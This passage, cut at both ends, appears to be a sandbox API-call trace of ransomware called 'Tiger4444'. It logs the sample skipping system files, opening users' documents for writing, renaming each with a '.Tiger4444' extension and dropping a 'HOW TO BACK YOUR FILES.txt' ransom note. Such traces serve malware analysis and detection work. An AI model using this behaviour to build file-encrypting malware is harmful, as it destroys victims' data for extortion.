(lpString1=".ods", lpString2=".lnk") returned 1 [0047.715] lstrlenW (lpString=".ini") returned 4 [0047.716] lstrcmpiW (lpString1=".ods", lpString2=".ini") returned 1 [0047.716] lstrlenW (lpString=".sys") returned 4 [0047.716] lstrcmpiW (lpString1=".ods", lpString2=".sys") returned -1 [0047.716] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\FZyK4S\\TUjgZaL_tfSm-QNcJ8.ods" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\-plmuaf\\fzyk4s\\tujgzal_tfsm-qncj8.ods"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0047.716] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0047.716] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13916898619) returned 1 [0047.716] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=14932) returned 1 [0047.716] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89950 [0047.716] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71ea0 [0047.716] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3d60, lpName=0x0) returned 0x2c8 [0047.716] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3d60) returned 0xbe0000 [0047.717] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0047.717] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75ec8 [0047.717] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0047.717] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75db0 [0047.717] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0047.717] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75db0 | out: hHeap=0xc50000) returned 1 [0047.717] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0047.717] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75ec8 | out: hHeap=0xc50000) returned 1 [0047.717] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13917060488) returned 1 [0047.718] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89950 | out: hHeap=0xc50000) returned 1 [0047.718] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71ea0 | out: hHeap=0xc50000) returned 1 [0047.718] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0047.718] CloseHandle (hObject=0x2c8) returned 1 [0047.718] CloseHandle (hObject=0x260) returned 1 [0047.719] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\FZyK4S\\TUjgZaL_tfSm-QNcJ8.ods.Tiger4444") returned 90 [0047.719] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\FZyK4S\\TUjgZaL_tfSm-QNcJ8.ods" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\-plmuaf\\fzyk4s\\tujgzal_tfsm-qncj8.ods"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\FZyK4S\\TUjgZaL_tfSm-QNcJ8.ods.Tiger4444" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\-plmuaf\\fzyk4s\\tujgzal_tfsm-qncj8.ods.tiger4444"), dwFlags=0x1) returned 1 [0047.719] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=14944 | out: Addend=0xc6f980) returned 23217552 [0047.719] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=1 | out: Addend=0xc6f98c) returned 4882 [0047.719] FindNextFileW (in: hFindFile=0xc730c8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85527460, ftCreationTime.dwHighDateTime=0x1d4ce86, ftLastAccessTime.dwLowDateTime=0x49d5cf80, ftLastAccessTime.dwHighDateTime=0x1d4cfe0, ftLastWriteTime.dwLowDateTime=0x49d5cf80, ftLastWriteTime.dwHighDateTime=0x1d4cfe0, nFileSizeHigh=0x0, nFileSizeLow=0x1816b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xAZVXzPkRJ6.pptx", cAlternateFileName="XAZVXZ~1.PPT")) returned 1 [0047.719] lstrcmpiW (lpString1="xAZVXzPkRJ6.pptx", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0047.719] lstrcmpiW (lpString1="xAZVXzPkRJ6.pptx", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.720] lstrcmpiW (lpString1="xAZVXzPkRJ6.pptx", lpString2="Tiger4444.exe") returned 1 [0047.720] lstrcmpiW (lpString1="xAZVXzPkRJ6.pptx", lpString2=".") returned 1 [0047.720] lstrcmpiW (lpString1="xAZVXzPkRJ6.pptx", lpString2="..") returned 1 [0047.720] lstrcmpiW (lpString1="xAZVXzPkRJ6.pptx", lpString2="windows") returned 1 [0047.720] lstrcmpiW (lpString1="xAZVXzPkRJ6.pptx", lpString2="bootmgr") returned 1 [0047.720] lstrcmpiW (lpString1="xAZVXzPkRJ6.pptx", lpString2="pagefile.sys") returned 1 [0047.720] lstrcmpiW (lpString1="xAZVXzPkRJ6.pptx", lpString2="boot") returned 1 [0047.720] lstrcmpiW (lpString1="xAZVXzPkRJ6.pptx", lpString2="ids.txt") returned 1 [0047.720] lstrcmpiW (lpString1="xAZVXzPkRJ6.pptx", lpString2="NTUSER.DAT") returned 1 [0047.720] lstrcpyW (in: lpString1=0x30aeb1c, lpString2="xAZVXzPkRJ6.pptx" | out: lpString1="xAZVXzPkRJ6.pptx") returned="xAZVXzPkRJ6.pptx" [0047.720] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\FZyK4S\\xAZVXzPkRJ6.pptx", dwFileAttributes=0x0) returned 1 [0047.720] lstrlenW (lpString="xAZVXzPkRJ6.pptx") returned 16 [0047.720] lstrlenW (lpString="Tiger4444") returned 9 [0047.720] lstrcmpiW (lpString1="kRJ6.pptx", lpString2="Tiger4444") returned -1 [0047.720] lstrlenW (lpString=".dll") returned 4 [0047.720] lstrcmpiW (lpString1="pptx", lpString2=".dll") returned 1 [0047.720] lstrlenW (lpString=".lnk") returned 4 [0047.720] lstrcmpiW (lpString1="pptx", lpString2=".lnk") returned 1 [0047.720] lstrlenW (lpString=".ini") returned 4 [0047.720] lstrcmpiW (lpString1="pptx", lpString2=".ini") returned 1 [0047.720] lstrlenW (lpString=".sys") returned 4 [0047.720] lstrcmpiW (lpString1="pptx", lpString2=".sys") returned 1 [0047.720] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\FZyK4S\\xAZVXzPkRJ6.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\-plmuaf\\fzyk4s\\xazvxzpkrj6.pptx"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0047.721] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0047.721] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13917372343) returned 1 [0047.721] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=98667) returned 1 [0047.721] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89c20 [0047.721] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc716a8 [0047.721] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x18470, lpName=0x0) returned 0x2c8 [0047.721] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x18470) returned 0xbe0000 [0047.724] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0047.724] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76440 [0047.724] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0047.724] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75950 [0047.724] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0047.724] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75950 | out: hHeap=0xc50000) returned 1 [0047.724] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0047.724] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76440 | out: hHeap=0xc50000) returned 1 [0047.724] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13917725533) returned 1 [0047.724] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89c20 | out: hHeap=0xc50000) returned 1 [0047.724] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc716a8 | out: hHeap=0xc50000) returned 1 [0047.724] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0047.725] CloseHandle (hObject=0x2c8) returned 1 [0047.725] CloseHandle (hObject=0x260) returned 1 [0047.726] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\FZyK4S\\xAZVXzPkRJ6.pptx.Tiger4444") returned 84 [0047.726] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\FZyK4S\\xAZVXzPkRJ6.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\-plmuaf\\fzyk4s\\xazvxzpkrj6.pptx"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\FZyK4S\\xAZVXzPkRJ6.pptx.Tiger4444" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\-plmuaf\\fzyk4s\\xazvxzpkrj6.pptx.tiger4444"), dwFlags=0x1) returned 1 [0047.727] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=98672 | out: Addend=0xc6f980) returned 23232496 [0047.727] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=3 | out: Addend=0xc6f98c) returned 4883 [0047.727] FindNextFileW (in: hFindFile=0xc730c8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc506630, ftCreationTime.dwHighDateTime=0x1d4c639, ftLastAccessTime.dwLowDateTime=0xcb248d0, ftLastAccessTime.dwHighDateTime=0x1d4c870, ftLastWriteTime.dwLowDateTime=0xcb248d0, ftLastWriteTime.dwHighDateTime=0x1d4c870, nFileSizeHigh=0x0, nFileSizeLow=0xd1c8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zOFtTnfv6Q_MW3.rtf", cAlternateFileName="ZOFTTN~1.RTF")) returned 1 [0047.727] lstrcmpiW (lpString1="zOFtTnfv6Q_MW3.rtf", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0047.727] lstrcmpiW (lpString1="zOFtTnfv6Q_MW3.rtf", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.727] lstrcmpiW (lpString1="zOFtTnfv6Q_MW3.rtf", lpString2="Tiger4444.exe") returned 1 [0047.727] lstrcmpiW (lpString1="zOFtTnfv6Q_MW3.rtf", lpString2=".") returned 1 [0047.727] lstrcmpiW (lpString1="zOFtTnfv6Q_MW3.rtf", lpString2="..") returned 1 [0047.727] lstrcmpiW (lpString1="zOFtTnfv6Q_MW3.rtf", lpString2="windows") returned 1 [0047.727] lstrcmpiW (lpString1="zOFtTnfv6Q_MW3.rtf", lpString2="bootmgr") returned 1 [0047.727] lstrcmpiW (lpString1="zOFtTnfv6Q_MW3.rtf", lpString2="pagefile.sys") returned 1 [0047.727] lstrcmpiW (lpString1="zOFtTnfv6Q_MW3.rtf", lpString2="boot") returned 1 [0047.727] lstrcmpiW (lpString1="zOFtTnfv6Q_MW3.rtf", lpString2="ids.txt") returned 1 [0047.727] lstrcmpiW (lpString1="zOFtTnfv6Q_MW3.rtf", lpString2="NTUSER.DAT") returned 1 [0047.727] lstrcpyW (in: lpString1=0x30aeb1c, lpString2="zOFtTnfv6Q_MW3.rtf" | out: lpString1="zOFtTnfv6Q_MW3.rtf") returned="zOFtTnfv6Q_MW3.rtf" [0047.727] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\FZyK4S\\zOFtTnfv6Q_MW3.rtf", dwFileAttributes=0x0) returned 1 [0047.728] lstrlenW (lpString="zOFtTnfv6Q_MW3.rtf") returned 18 [0047.728] lstrlenW (lpString="Tiger4444") returned 9 [0047.728] lstrcmpiW (lpString1="Q_MW3.rtf", lpString2="Tiger4444") returned -1 [0047.728] lstrlenW (lpString=".dll") returned 4 [0047.728] lstrcmpiW (lpString1=".rtf", lpString2=".dll") returned 1 [0047.728] lstrlenW (lpString=".lnk") returned 4 [0047.728] lstrcmpiW (lpString1=".rtf", lpString2=".lnk") returned 1 [0047.728] lstrlenW (lpString=".ini") returned 4 [0047.728] lstrcmpiW (lpString1=".rtf", lpString2=".ini") returned 1 [0047.728] lstrlenW (lpString=".sys") returned 4 [0047.728] lstrcmpiW (lpString1=".rtf", lpString2=".sys") returned -1 [0047.728] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\FZyK4S\\zOFtTnfv6Q_MW3.rtf" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\-plmuaf\\fzyk4s\\zofttnfv6q_mw3.rtf"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0047.728] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0047.728] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13918128942) returned 1 [0047.728] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=53704) returned 1 [0047.728] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89c20 [0047.728] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc720c0 [0047.728] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xd4d0, lpName=0x0) returned 0x2c8 [0047.729] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xd4d0) returned 0xbe0000 [0047.870] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0047.980] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75fe0 [0047.980] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0047.980] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75608 [0047.980] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0047.980] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75608 | out: hHeap=0xc50000) returned 1 [0047.980] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0047.980] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75fe0 | out: hHeap=0xc50000) returned 1 [0047.980] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13943310764) returned 1 [0047.980] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89c20 | out: hHeap=0xc50000) returned 1 [0047.980] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc720c0 | out: hHeap=0xc50000) returned 1 [0047.980] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0047.981] CloseHandle (hObject=0x2c8) returned 1 [0047.981] CloseHandle (hObject=0x260) returned 1 [0047.981] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\FZyK4S\\zOFtTnfv6Q_MW3.rtf.Tiger4444") returned 86 [0047.981] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\FZyK4S\\zOFtTnfv6Q_MW3.rtf" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\-plmuaf\\fzyk4s\\zofttnfv6q_mw3.rtf"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\FZyK4S\\zOFtTnfv6Q_MW3.rtf.Tiger4444" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\-plmuaf\\fzyk4s\\zofttnfv6q_mw3.rtf.tiger4444"), dwFlags=0x1) returned 1 [0047.985] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=53712 | out: Addend=0xc6f980) returned 23331168 [0047.985] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=251 | out: Addend=0xc6f98c) returned 4886 [0047.985] FindNextFileW (in: hFindFile=0xc730c8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc506630, ftCreationTime.dwHighDateTime=0x1d4c639, ftLastAccessTime.dwLowDateTime=0xcb248d0, ftLastAccessTime.dwHighDateTime=0x1d4c870, ftLastWriteTime.dwLowDateTime=0xcb248d0, ftLastWriteTime.dwHighDateTime=0x1d4c870, nFileSizeHigh=0x0, nFileSizeLow=0xd1c8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zOFtTnfv6Q_MW3.rtf", cAlternateFileName="ZOFTTN~1.RTF")) returned 0 [0047.985] FindClose (in: hFindFile=0xc730c8 | out: hFindFile=0xc730c8) returned 1 [0047.985] lstrcpyW (in: lpString1=0x30aeb1c, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0047.985] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\FZyK4S\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\-plmuaf\\fzyk4s\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0047.985] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0047.985] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0047.986] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0047.986] CloseHandle (hObject=0x260) returned 1 [0047.986] CloseHandle (hObject=0x2ac) returned 1 [0047.986] GetCurrentThreadId () returned 0xfa8 [0047.986] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc663a8 [0047.986] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\8TIq-qdhatQQU4", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\8TIq-qdhatQQU4") returned="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\8TIq-qdhatQQU4" [0047.986] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc79798 | out: hHeap=0xc50000) returned 1 [0047.987] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc663a0 | out: hHeap=0xc50000) returned 1 [0047.987] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\8TIq-qdhatQQU4" | out: lpString1="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\8TIq-qdhatQQU4") returned="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\8TIq-qdhatQQU4" [0047.987] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\8TIq-qdhatQQU4", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\8TIq-qdhatQQU4\\") returned="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\8TIq-qdhatQQU4\\" [0047.987] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\8TIq-qdhatQQU4\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\8TIq-qdhatQQU4\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\8TIq-qdhatQQU4\\.BFC0E91B00AE8A0620D3" [0047.987] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\8TIq-qdhatQQU4\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\-plmuaf\\8tiq-qdhatqqu4\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0047.988] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0047.991] FlushFileBuffers (hFile=0x2ac) returned 1 [0047.992] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\8TIq-qdhatQQU4\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0047.992] CloseHandle (hObject=0x2ac) returned 1 [0047.992] lstrlenW (lpString="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\8TIq-qdhatQQU4") returned 65 [0047.992] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0047.992] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\-plMuAf\\8TIq-qdhatQQU4\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xda916690, ftCreationTime.dwHighDateTime=0x1d4cd8a, ftLastAccessTime.dwLowDateTime=0xb05fef0, ftLastAccessTime.dwHighDateTime=0x1d4cff0, ftLastWriteTime.dwLowDateTime=0x819f208d, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc73148 [0047.993] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.993] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0047.993] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0047.993] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0047.993] FindNextFileW (in: hFindFile=0xc73148, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xda916690, ftCreationTime.dwHighDateTime=0x1d4cd8a, ftLastAccessTime.dwLowDateTime=0xb05fef0, ftLastAccessTime.dwHighDateTime=0x1d4cff0, ftLastWriteTime.dwLowDateTime=0x819f208d, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0047.993] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.993] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0047.993] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0047.993] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0047.993] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0047.993] FindNextFileW (in: hFindFile=0xc73148, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x819f208d, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x819f208d, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x819f208d, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0047.993] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.993] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0047.993] FindNextFileW (in: hFindFile=0xc73148, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x738e85d0, ftCreationTime.dwHighDateTime=0x1d4ce76, ftLastAccessTime.dwLowDateTime=0x3954dee0, ftLastAccessTime.dwHighDateTime=0x1d4c896, ftLastWriteTime.dwLowDateTime=0x3954dee0, ftLastWriteTime.dwHighDateTime=0x1d4c896, nFileSizeHigh=0x0, nFileSizeLow=0x11de7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9ehLACIDaiZ9PxP8jeTb.odp", cAlternateFileName="9EHLAC~1.ODP")) returned 1 [0047.993] lstrcmpiW (lpString1="9ehLACIDaiZ9PxP8jeTb.odp", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.993] lstrcmpiW (lpString1="9ehLACIDaiZ9PxP8jeTb.odp", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.993] lstrcmpiW (lpString1="9ehLACIDaiZ9PxP8jeTb.odp", lpString2="Tiger4444.exe") returned -1 [0047.993] lstrcmpiW (lpString1="9ehLACIDaiZ9PxP8jeTb.odp", lpString2=".") returned 1 [0047.993] lstrcmpiW (lpString1="9ehLACIDaiZ9PxP8jeTb.odp", lpString2="..") returned 1 [0047.993] lstrcmpiW (lpString1="9ehLACIDaiZ9PxP8jeTb.odp", lpString2="windows") returned -1 [0047.993] lstrcmpiW (lpString1="9ehLACIDaiZ9PxP8jeTb.odp", lpString2="bootmgr") returned -1 [0047.993] lstrcmpiW (lpString1="9ehLACIDaiZ9PxP8jeTb.odp", lpString2="pagefile.sys") returned -1 [0047.993] lstrcmpiW 